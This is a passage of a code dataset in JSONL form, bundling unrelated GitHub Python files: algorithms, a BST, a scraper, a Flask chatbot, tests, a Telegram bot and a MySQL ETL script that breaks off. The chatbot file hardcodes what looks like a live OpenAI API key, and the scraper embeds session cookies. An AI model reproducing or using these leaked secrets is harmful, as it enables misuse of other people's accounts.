range(int(len(self._I2[0]) / blockSize)):\n regionPoints = self.regionStart([i * blockSize, j * blockSize], blockSize, regionSize)\n tempRegionSize = regionSize\n bestOne = [0, 0]\n bestMAE = 255 * blockSize * blockSize\n for k in range(int(log2(regionSize / blockSize))):\n logPoints = self.logPoints(blockSize, tempRegionSize, regionPoints)\n for p in range(len(logPoints)):\n MAE = self.calcMae(blockSize, [i * blockSize, j * blockSize], logPoints[p])\n\n if MAE < bestMAE:\n bestMAE = MAE\n bestOne = logPoints[p]\n\n tempRegionSize /= 2\n\n vectorsRow.append([bestOne[0], bestOne[1], i * blockSize, j * blockSize])\n vectors.append(vectorsRow)\n\n return vectors\n\n def __init__(self, I1, I2):\n self._I1 = I1\n self._I2 = I2\n","repo_name":"furkankuse/Multimedia-Homeworks","sub_path":"MultimediaHW2/LogarithmicSearch.py","file_name":"LogarithmicSearch.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1747151270","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\nclass BinarySearchTree:\n def __init__(self): \n self.root = None\n\n def insert(self, data): \n if self.root == None:\n self.root = Node(data)\n else:\n current = self.root\n \n while True:\n if data < current.data:\n if current.left:\n current = current.left\n else:\n current.left = Node(data)\n break\n elif data > current.data:\n if current.right:\n current = current.right\n else:\n current.right = Node(data)\n break\n else:\n # data == current.data\n break\n\ndef preorder(root):\n # root, left, right\n if root == None:\n return\n\n print(root.data)\n preorder(root.left)\n preorder(root.right) \n\ndef inorder(root):\n # left, root, right\n if root == None:\n return\n\n inorder(root.left)\n print(root.data)\n inorder(root.right) \n\n\ndef postorder(root):\n # left, right, root\n if root == None:\n return\n\n postorder(root.left)\n postorder(root.right) \n print(root.data)\n\ndef preorderStack(root):\n stack = [root]\n\n while stack:\n current = stack.pop()\n \n print(current.data)\n if current.right: \n stack.append(current.right)\n if current.left: \n stack.append(current.left)\n\ndef inorderStack(root):\n stack = []\n current = root\n\n while stack or current:\n if current: \n stack.append(current)\n current = current.left\n else:\n current = stack.pop()\n print(current.data)\n current = current.right\n\ndef levelorder(root):\n queue = [root]\n \n while queue:\n current = queue.pop(0)\n print(current.data)\n\n if current.left:\n queue.append(current.left)\n if current.right:\n queue.append(current.right)\n\ndef search(root, value):\n if root == None:\n print(\"Not found\")\n return -1\n\n if value == root.data:\n return root.data\n \n if value < root.data:\n return search(root.left, value)\n else:\n return search(root.right, value)\n\ntree = BinarySearchTree()\ntree.insert(10)\ntree.insert(3)\ntree.insert(5)\ntree.insert(2)\ntree.insert(18)\ntree.insert(12)\ntree.insert(20)\n\nprint(\"PREORDER RECURSIVE:\")\npreorder(tree.root)\nprint(\"INORDER RECURSIVE:\")\ninorder(tree.root)\nprint(\"POSTORDER RECURSIVE:\")\npostorder(tree.root)\n\nprint(\"PREORDER STACK:\")\npreorderStack(tree.root)\nprint(\"INORDER STACK:\")\ninorderStack(tree.root)\n\nprint(\"LEVEL ORDER:\")\nlevelorder(tree.root)\n\nprint(search(tree.root, 5))\n\n\n\n\n","repo_name":"arif599/Data-Structures-and-Algorithms","sub_path":"Tree/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39943330216","text":"import math\r\n\r\ndef square(radicand):\r\n perfect_squares = []\r\n gcf = 0\r\n for i in range(1, 17):\r\n perfect_squares.append(i**2)\r\n for i in range(16):\r\n if (radicand % perfect_squares[i]) == 0:\r\n gcf = perfect_squares[i]\r\n return (u\"{}\\u221A{}\").format(int(math.sqrt(gcf)), int(radicand / gcf))\r\n\r\ndef cube(radicand):\r\n perfect_cubes = []\r\n gcf = 0\r\n for i in range(1, 7):\r\n perfect_cubes.append(i**3)\r\n for i in range(6):\r\n if (radicand % perfect_cubes[i]) == 0:\r\n gcf = perfect_cubes[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/3)), int(radicand / gcf))\r\n\r\ndef tetra(radicand):\r\n perfect_tesseracts = []\r\n gcf = 0\r\n for i in range(1, 5):\r\n perfect_tesseracts.append(i**4)\r\n for i in range(4):\r\n if (radicand % perfect_tesseracts[i]) == 0:\r\n gcf = perfect_tesseracts[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/4)), int(radicand / gcf))\r\n\r\ndef penta(radicand):\r\n perfect_hypercubes = []\r\n gcf = 0\r\n for i in range(1, 4):\r\n perfect_hypercubes.append(i**5)\r\n for i in range(3):\r\n if (radicand % perfect_hypercubes[i]) == 0:\r\n gcf = perfect_hypercubes[i]\r\n return (u\"{}\\u221A{}\").format(round(math.pow(gcf, 1/5)), int(radicand / gcf))\r\n\r\ndef whole_to_mixed(index, radicand):\r\n if index == 2:\r\n return square(radicand)\r\n elif index == 3:\r\n return cube(radicand)\r\n elif index == 4:\r\n return tetra(radicand)\r\n elif index == 5:\r\n return penta(radicand)\r\n\r\n#index = int(input(\"Please enter an index for the whole radical: \"))\r\n#radical = int(input(\"Enter a number inside of a whole radical e.g. 5: \"))\r\n\r\n#print(round(math.pow(32, 1/5))\r\n\r\nprint(whole_to_mixed(2, 19860))\r\n\r\n#print((u\"{}\\u221A{}\").format(int(math.sqrt(squaregcf)), int(radical / squaregcf)))\r\n\r\nprint(\"Program Ended\")\r\n","repo_name":"Enprogames/Triangle_Drawing","sub_path":"wholetomixedradical.py","file_name":"wholetomixedradical.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43372811060","text":"a = int(input())\narr = []\nfor i in range(a):\n arr.append(list(map(int, input().split(' '))))\nfor i in range(a):\n cnt = 0\n avg = sum(arr[i][1:]) / (len(arr[i]) - 1)\n for j in range(1,len(arr[i])):\n if (arr[i][j] > avg):\n cnt += 1\n print('{:.3f}'.format(round((cnt / (len(arr[i]) - 1) * 100),3)),\"%\",sep = '')\n","repo_name":"3StarAnchovy/studyBaekjoon","sub_path":"Level5/studentAvg.py","file_name":"studentAvg.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74088017481","text":"#! /usr/bin/python\n# -*- coding:utf-8 -*- \nimport requests\nfrom bs4 import BeautifulSoup\ndata={\n'type':'all',\n'content':''\n }\nheader={\n'Connection':'keep-alive',\n'Content-Type':'text/html;charset=UTF-8',\n'Server':'nginx/1.9.3',\n'Transfer-Encoding':'chunked',\n'Accept':'*/*',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n'Content-Length':'858',\n'Content-Type':'application/x-www-form-urlencoded',\n'Cookie':'JSESSIONID=F59B0CD1162D1E5FB262E3FAE2E96E48; JSESSIONID=ED74A28FAD51091385C4C959E2E8FA1B',\n'Host':'ictclas.nlpir.org',\n'Origin':'http://ictclas.nlpir.org',\n'Referer':'http://ictclas.nlpir.org/nlpir/',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n'X-Requested-With':'XMLHttpRequest'\n }\ndef save_to_file(file_name, contents):\n fh = open(file_name, 'w')\n fh.write(contents)\n fh.close()\ndef cncorpus(args):\n data['content'] = args\n try:\n html1 = requests.post('http://ictclas.nlpir.org/nlpir/index/getAllContentNew.do', data = data)\n html = html1.text \n soup = BeautifulSoup(html,\"lxml\")\n return(eval(soup.get_text())['dividewords'])\n except:\n return(args)\n# process\nfo = open(\"../input.txt\", \"r\")\nfile=open('cas.txt','w')\ni = 0 \nfor line in fo.readlines(): \n line = line.strip() \n args = '正正正正正正正正正正正正正正正正正正正正正正正正正正正正正正'+line.split()[0]\n corpus = cncorpus(args)[120:]\n file.write(corpus)\n file.write(\"\\n\")\n file.flush()\n i += 1\n print(i)\nfo.close() \nfile.close()\n","repo_name":"FonzieTree/toobox","sub_path":"beautiful.py","file_name":"beautiful.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"31166425040","text":"from flask import Flask, request, jsonify\nimport openai\n\napp = Flask(__name__, static_folder='frontend/build', static_url_path='/')\n\n# Configure OpenAI API credentials\nopenai.api_key = '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'\n\n@app.route('/chatbot', methods=['POST'])\ndef chatbot():\n data = request.get_json()\n message = data['message']\n\n prompt = f\"I have a fashion-related question: {message}\"\n \n # Make a request to OpenAI API for the chatbot response\n response = openai.Completion.create(\n engine='text-davinci-003',\n prompt=prompt,\n max_tokens=50,\n n=1,\n stop=None,\n temperature=0.7,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n answer = response.choices[0].text.strip()\n\n return jsonify({'response': answer})\n\n@app.route('/')\ndef serve_frontend():\n return app.send_static_file('index.html')\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Solexi/styleBot","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4748785003","text":"import unittest\nimport json\nfrom tests.base import BaseTestCase\n\n\nclass TestGetQuestion(BaseTestCase):\n \"\"\"\n Test suite for QuestionView Method View Class\n\n Arguments:\n BaseTestCase {Class} -- Base test class for running custom tests\n \"\"\"\n # GET\n\n def test_get_question_by_id(self):\n \"\"\"\n Test successful GET request to fetch a question by id\n \"\"\"\n with self.client:\n # post a question\n _ = self.create_question()\n\n # get that question by id\n response = self.client.get(\n '/api/v1/questions/1',\n content_type='application/json'\n )\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertTrue(data['status'], 'success')\n self.assertTrue(data['question']['title'], 'second endpoint')\n self.assertIn('question', data)\n self.assertIsInstance(data['question']['answers'], list)\n\n def test_cant_get_question_with_out_of_range_index(self):\n \"\"\"\n Test unsuccessful GET request to fetch\n a question with an out of range id index\n \"\"\"\n with self.client:\n # post a question\n _ = self.create_question()\n\n # get that question by id\n response = self.client.get(\n '/api/v1/questions/20',\n content_type='application/json'\n )\n\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertRaises(KeyError)\n self.assertTrue(data['status'], 'failed')\n\n def test_get_question_with_wrong_content_type(self):\n \"\"\"\n Test unsuccessful GET request to\n fetch a question with wrong content type\n \"\"\"\n with self.client:\n response = self.client.get(\n '/api/v1/questions/1',\n content_type='xml'\n )\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertTrue(data['status'], 'failed')\n self.assertTrue(data['message'], 'request must be of type json')\n","repo_name":"mycok/stack-overflow-lite-API-v1","sub_path":"tests/test_get_single_question.py","file_name":"test_get_single_question.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35033700769","text":"from unittest import TestCase\nfrom ds_exam.sequence_question import find_most_frequent\nimport random\n\n\nclass SequenceTest(TestCase):\n\n def test_implementation(self):\n in1 = [1]\n in2 = random.choices([2, 3, 4, 5, 6], k=100)\n in2 = in2 + [7]*101\n random.shuffle(in2)\n print(in2)\n out1 = find_most_frequent(in1)\n out2 = find_most_frequent(in2)\n self.assertEqual(out1, 1)\n self.assertEqual(out2, 7)\n","repo_name":"aviadkfbx/ds-exam","sub_path":"sequence_question_test.py","file_name":"sequence_question_test.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73750192199","text":"import hyperopt as hp\nfrom hyperopt import Trials, fmin, space_eval\nfrom ItemCollaborativeFilter import ItemCollaborativeFilter\nfrom utils.run import RunRecommender\nimport numpy as np\nfrom utils.helper import Helper\n\nhelper = Helper()\n\nN_K_FOLD = 10\n\n### Step 1 : defining the objective function\ndef objective(params):\n print('###########################################')\n params[\"topK\"] = int(params[\"topK\"])\n print(\"Current parameters:\")\n print(params)\n loss = - RunRecommender.evaluate_on_validation_set(ItemCollaborativeFilter, params, Kfold=N_K_FOLD, parallel_fit=False, parallelize_evaluation=True)\n return loss\n\nsearch_space = {\n \"topK\": hp.hp.quniform('topK', 0, 1000, 5),\n \"shrink\": hp.hp.uniformint('shrink', 0, 50),\n \"bm_25_norm\": hp.hp.choice('bm_25_norm', [True, False]),\n \"normalize\": hp.hp.choice('normalize', [True, False]),\n \"similarity\": hp.hp.choice('similarity', [\"cosine\", \"jaccard\", \"dice\"])\n}\n\n\nif __name__ == '__main__':\n ### step 3 : storing the results of every iteration\n bayes_trials = Trials()\n MAX_EVALS = 100\n\n item_cf_parameters = {'shrink': 46.0, 'similarity': \"jaccard\", 'topK': 8}\n\n # Optimize\n best = fmin(fn=objective, space=search_space, algo=hp.tpe.suggest,\n max_evals=MAX_EVALS, trials=bayes_trials, verbose=True, points_to_evaluate=item_cf_parameters)\n\n params = space_eval(search_space, best)\n\n ### best will the return the the best hyperparameter set\n\n\n print(\"Best parameters:\")\n print(params)\n params[\"topK\"] = int(params[\"topK\"])\n\n\n RunRecommender.evaluate_on_test_set(ItemCollaborativeFilter, best, parallel_fit=False, Kfold=N_K_FOLD, parallelize_evaluation=True )\n","repo_name":"d1ggs/RecSys_Challenge-2019","sub_path":"hyperopt_ICF.py","file_name":"hyperopt_ICF.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27210898399","text":"import pymel.core as pm\nfrom pipeline_utilities import filenaming\n\n#setting the render settings\n\n\ndef getEditor():\n \"\"\"\n The modelEditor is the node in maya that contains all the information about a modelPanel. A panel is an object in maya that acts as the root of a ui element. The model editor\n for instance holds information about what cameras have been added to a panel.\n \"\"\"\n if pm.modelEditor(\"mypanel\",exists=True):\n print(\"the panel exists...deleting and creating a new one\")\n pm.deleteUI(\"mypanel\") \n \n cam = pm.ls(selection=True)[0]\n #SETTING CAMERA VIEWPORT SETTINGS\n pm.camera(cam,edit=True,displayResolution=False,displayFilmGate=False)\n\n window = pm.window(width=1280,height=720,backgroundColor=(1.0,0.0,0.0))\n lay = pm.paneLayout()\n pan = pm.modelPanel()\n pm.modelEditor(\"mypanel\",camera=cam,activeView=True,displayAppearance=\"smoothShaded\")\n pm.showWindow(window,window=True)\n\ndef setBlastSettings():\n #these can only be set on global level\n pm.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\",1)\n pm.setAttr(\"hardwareRenderingGlobals.ssaoEnable\",False)\n\n\ndef saveLocation():\n \n startpath = filenaming.getexportdir(\"playblast\")\n exportfilepath = pm.fileDialog2(dialogStyle=2, startingDirectory=startpath,fileMode=3,caption=\"Select a save location\")\n\n return exportfilepath[0]\n\ndef pcBlast(savepath,startf,endf):\n\n #this runs the actual playblast \n pm.playblast(format=\"image\",filename=savepath,startTime=startf,endTime=endf,compression=\"jpg\",widthHeight=[1920,1080],percent=100,framePadding=3,showOrnaments=False,viewer=False)\n \n \n \n \n\n\n \n\n","repo_name":"all-in-one-of/polycat","sub_path":"pc_maya/exporters/pc_playblast.py","file_name":"pc_playblast.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20394381910","text":"\"\"\"实现希尔排序\"\"\"\ndef shell_sort(arr):\n def shell_insert(arr,d):\n n =len(arr) #计算数组的长度\n for i in range(d,n):\n j = i -d\n temp = arr[i]\n while(j >= 0 and arr[j] > temp): #从后往前,寻找比其小的数的位置\n arr[j+d]=arr[j]\n j-=d\n if j != i - d:\n arr[j+d] = temp\n\n n = len(arr)\n if n<= 1:\n return arr\n d = n//2 #列表的跨度\n while d >= 1:\n shell_insert(arr,d)\n d = d//2\n return arr\n\nif __name__ == '__main__':\n arr= [5, 1, 1, 2, 0, 0]\n sort_1 = shell_sort(arr)\n print(sort_1)","repo_name":"Allen19990307/PythonDeveloper","sub_path":"SortAlgorithms/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1854197128","text":"import config\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nimport db\n\ndef on_message(bot, update):\n user = update.message.from_user\n \n logger.info(\"User %s sent '%s'\" % (user.username or user.id, update.message.text))\n db_user = db.users.getOrCreateUser(user.id, user.username, user.first_name, user.last_name)\n update.message.reply_text(config.IDLE_TEXT)\n \ndef error_handler(bot, update, error):\n logger.warning('Update \"%s\" caused error \"%s\"' % (update, error))\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n logger = logging.getLogger(__name__)\n logFormatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fileHandler = logging.FileHandler(\"./log.txt\")\n fileHandler.setFormatter(logFormatter)\n logger.addHandler(fileHandler)\n \n # https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/echobot2.py\n updater = Updater(config.BOT_TOKEN)\n dp = updater.dispatcher\n dp.add_handler(CommandHandler(\"start\", on_message))\n dp.add_handler(MessageHandler(Filters.text, on_message))\n dp.add_error_handler(error_handler)\n updater.start_polling()\n logger.info(\"Idle bot started\")\n updater.idle()\n","repo_name":"michaeluskov/BardakBot","sub_path":"idle_bot.py","file_name":"idle_bot.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36189596532","text":"#In[]\n#!/usr/bin/env python\n# coding: utf-8\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Nov 23 09:16:47 2021\n 切分数据到MySQL表 ods_gd_points_web_*\nChanged\n 2021-12-06resouece_list新增result处理\n\"\"\"\n\nimport json,re,configparser,os,pymysql,pandas as pd,json,numpy as np,time\nfrom sqlalchemy import create_engine\nprint(\"START TIME : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n\n\npymysql.install_as_MySQLdb()\ncf = configparser.ConfigParser()\npath = os.path.abspath(os.curdir)\nconfpath = path + \"/conf/config4.ini\"\ncf.read(confpath) # 读取配置文件,如果写文件的绝对路径,就可以不用os模块\nuser = cf.get(\"Mysql\", \"user\") # 获取user对应的值\npassword = cf.get(\"Mysql\", \"password\") # 获取password对应的值\ndb_host = cf.get(\"Mysql\", \"host\") # 获取host对应的值\ndatabase = cf.get(\"Mysql\", \"database\") # 获取dbname对应的值\n# table_name = 'ods_gd_points_web_pages'\n# database = 'odsdb'\n# input_file = '/data/ods/luohw_*'\ninput_file = 'C:\\\\Users\\\\86133\\\\Desktop\\\\ods_gd_points_web_pages_20220307'\ninput_table = 'ods_gd_points_web_pages'\n\n\n# -*- coding: utf-8 -*-\nclass MysqlClient:\n def __init__(self, db_host,database,user,password):\n \"\"\"\n create connection to hive server\n \"\"\"\n self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n def query(self, sql):\n \"\"\"\n query\n \"\"\"\n cur = self.conn.cursor()\n cur.execute(sql)\n res = cur.fetchall()\n columnDes = cur.description #获取连接对象的描述信息\n columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n cur.close()\n return data\n def close(self):\n self.conn.close()\n\ndef to_dws(result,table):\n engine = create_engine('mysql+mysqldb://'+user+':'+password+'@'+db_host+':'+'3306'+'/'+database+'?charset=utf8')\n result.to_sql(name = table,con = engine,if_exists = 'append',index = False,index_label = False)\ncon = MysqlClient(db_host,database,user,password)\nf = open(input_file,encoding='utf-8') #打开‘product.json’的json文件\nres = f.read() #读文件\n# newres = res[:6]\n\n\n\n\n#In[]\n####将第一层拆分\ndata = res.split(\"versions do not match\\n\")[1] #切分出json数据\ndata = data.replace('ObjectId(','').replace('),\\n\\t\"resource_list\"',',\\n\\t\"resource_list\"').replace('_id','id').replace('\\t','').replace('\\n','').replace('ISODate(','').replace('),\"appid\"',',\"appid\"').replace('}{\"id\"','},{\"id\"').replace('\"),\"create_time\" :','\",\"create_time\" :').replace('\"),\"type\" :','\",\"type\" :').replace('\"),\"duration\" :','\",\"duration\" :').replace('\"),\"top_pages\" :','\",\"top_pages\" :') # 替换脏字符\ndata = '['+data+']'\n#####转换为Json\ndf = json.loads(data)\n#####转换为DtaFrame\ndf1 = pd.json_normalize(df)\n\n\n\n#In[]\n####判断是那张表\nprint(\"本次加载数据表为: \"+input_table)\n\n\nif input_table == 'ods_gd_points_web_statis' :\n if len(df1) >0 :\n df1_tmp = df1\n ######清洗 top_pages\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages'] # 留作备份查看\n #####将备份数据从json转为字符串形式\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: str(x).replace(':','='))\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: str(x).replace('\\'',''))\n # #####清洗 top_pages 为空的不用处理,最后直接添加\n # df2 = df1[df1['top_pages_ods'] != \"Document[[]]\"]\n df2 = df1_tmp\n #####去除[]转换为json\n df2['top_pages'] = df2['top_pages'].map(lambda x: str(x)[1:])\n df2['top_pages'] = df2['top_pages'].map(lambda x: str(x)[:-1])\n #将一个 top_pages 拆分为多个\n df3 = df2.drop('top_pages',axis=1).join(df2['top_pages'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_pages')).reset_index(drop=True)\n # top_pages 处理成json的样式\n df3['top_pages'] = df3['top_pages'].map(lambda x: str(x)+\"}\")\n df3['top_pages'] = df3['top_pages'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('id\\': \\'url\\': ','id_url\\': ')+\"}\")\n \n #将处理好的dataframe整个转为json\n df4 = (df3.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df4 = df4.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n #####转换为字典\n df5 = json.loads(df4)\n #####转换为DtaFrame\n df6 = pd.json_normalize(df5)\n #####不放过任何一条数据\n # df6_tmp = df1[df1['top_pages_ods'] == \"Document[[]]\"]\n # df6_tmp['top_pages.id_url'] = np.nan\n # df6_tmp['top_pages.count'] =np.nan\n # df6 = df6.append(df6_tmp,ignore_index=False)\n\n\n ######清洗 top_jump_out\n df6['top_jump_out_ods'] = df6['top_jump_out'] # 留作备份查看\n ####将备份数据从json转为字符串形式\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: str(x).replace(':','='))\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: str(x).replace('\\'',''))\n # #####清洗 top_pages top_jump_out,最后直接添加\n # df7 = df6[df6['top_jump_out_ods'] != \"Document[[]]\"]\n df7 = df6\n #####去除[]转换为json\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)[1:])\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)[:-1])\n #将一个 top_jump_out 拆分为多个\n df7 = df7.drop('top_jump_out',axis=1).join(df7['top_jump_out'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_jump_out')).reset_index(drop=True)\n # top_jump_out 处理成json的样式\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)+\"}\")\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'value\\': ','\\'id_value\\': ')+\"}\")\n \n #将处理好的dataframe整个转为json\n df8 = (df7.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df8 = df8.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n #####转换为字典\n df9 = json.loads(df8)\n #####转换为DtaFrame\n df10 = pd.json_normalize(df9)\n #####不放过任何一条数据\n # df10_tmp = df6[df6['top_jump_out_ods'] == \"Document[[]]\"]\n # df10_tmp['top_jump_out.id_value'] = np.nan\n # df10_tmp['top_jump_out.count'] =np.nan\n # df10 = df10.append(df10_tmp,ignore_index=False)\n\n\n ######清洗 top_jump_out\n df10['top_browser_ods'] = df10['top_browser'] # 留作备份查看\n ####将备份数据从json转为字符串形式\n df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: str(x).replace(':','='))\n df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: str(x).replace('\\'',''))\n df11 = df10\n #####去除[]转换为json\n df11['top_browser'] = df11['top_browser'].map(lambda x: str(x)[1:])\n df11['top_browser'] = df11['top_browser'].map(lambda x: str(x)[:-1])\n #将一个 top_browser 拆分为多个\n df12 = df11.drop('top_browser',axis=1).join(df11['top_browser'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_browser')).reset_index(drop=True)\n # top_browser 处理成json的样式\n df12['top_browser'] = df12['top_browser'].map(lambda x: str(x)+\"}\")\n df12['top_browser'] = df12['top_browser'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'browser\\': ','\\'id_browser\\': ')+\"}\")\n \n #将处理好的dataframe整个转为json\n df13 = (df12.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df13 = df13.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n #####转换为字典\n df14 = json.loads(df13)\n #####转换为DtaFrame\n df14 = pd.json_normalize(df14)\n\n\n\n ######清洗 provinces\n df14['provinces_ods'] = df14['provinces'] # 留作备份查看\n ####将备份数据从json转为字符串形式\n df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: str(x).replace(':','='))\n df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: str(x).replace('\\'',''))\n df15 = df14\n #####去除[]转换为json\n df15['provinces'] = df15['provinces'].map(lambda x: str(x)[1:])\n df15['provinces'] = df15['provinces'].map(lambda x: str(x)[:-1])\n #将一个 provinces 拆分为多个\n df15 = df15.drop('provinces',axis=1).join(df15['provinces'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('provinces')).reset_index(drop=True)\n # provinces 处理成json的样式\n df15['provinces'] = df15['provinces'].map(lambda x: str(x)+\"}\")\n df15['provinces'] = df15['provinces'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'province\\': ','\\'id_province\\': ').replace('None','\\'暂无\\'')+\"}\")\n #将处理好的dataframe整个转为json\n df16 = (df15.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df16 = df16.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n #####转换为字典\n df17 = json.loads(df16)\n #####转换为DtaFrame\n df18 = pd.json_normalize(df17)\n result = df18\n #改列名\n result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','top_pages.id_url':'top_pages_id_url','top_pages.count':'top_pages_count','top_jump_out.id_value':'top_jump_out_id_value','top_jump_out.count':'top_jump_out_count','top_browser.id_browser':'top_browser_id_browser','top_browser.count':'top_browser_count','provinces.id_province':'provinces_id_province','provinces.count':'provinces_count','top_pages_ods':'top_pages','top_jump_out_ods':'top_jump_out','top_browser_ods':'top_browser','provinces_ods':'provinces'})\n #添加更新标识\n result['dr'] = 0\n result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result = result.drop(['data_v'],axis=1)\n else :\n result = df1\n\nelif input_table == 'ods_gd_points_web_axios' :\n result = df1\n #改列名\n result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n #添加更新标识\n result['dr'] = 0\n result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result = result[['app_id','create_time','url','speed_type','method','duration','decoded_body_size','options','full_url','call_url','mark_page','mark_user','app_mobile','dr','load_data_time','update_time','ods_id','response']]\n\nelif input_table == 'ods_gd_points_web_pvuvip' :\n result = df1\n #改列名\n result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n #添加更新标识\n result['dr'] = 0\n result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['depth'] = np.nan\n result['bounce'] = np.nan\n result = result[['app_id','pv','uv','ip','ajax','bounce','depth','flow','type','create_time','dr','load_data_time','update_time','ods_id']]\n\nelif input_table == 'ods_gd_points_web_environ' :\n result = df1\n #改列名\n result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n #添加更新标识\n result['dr'] = 0\n result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n result['county'] = result['province']\n result = 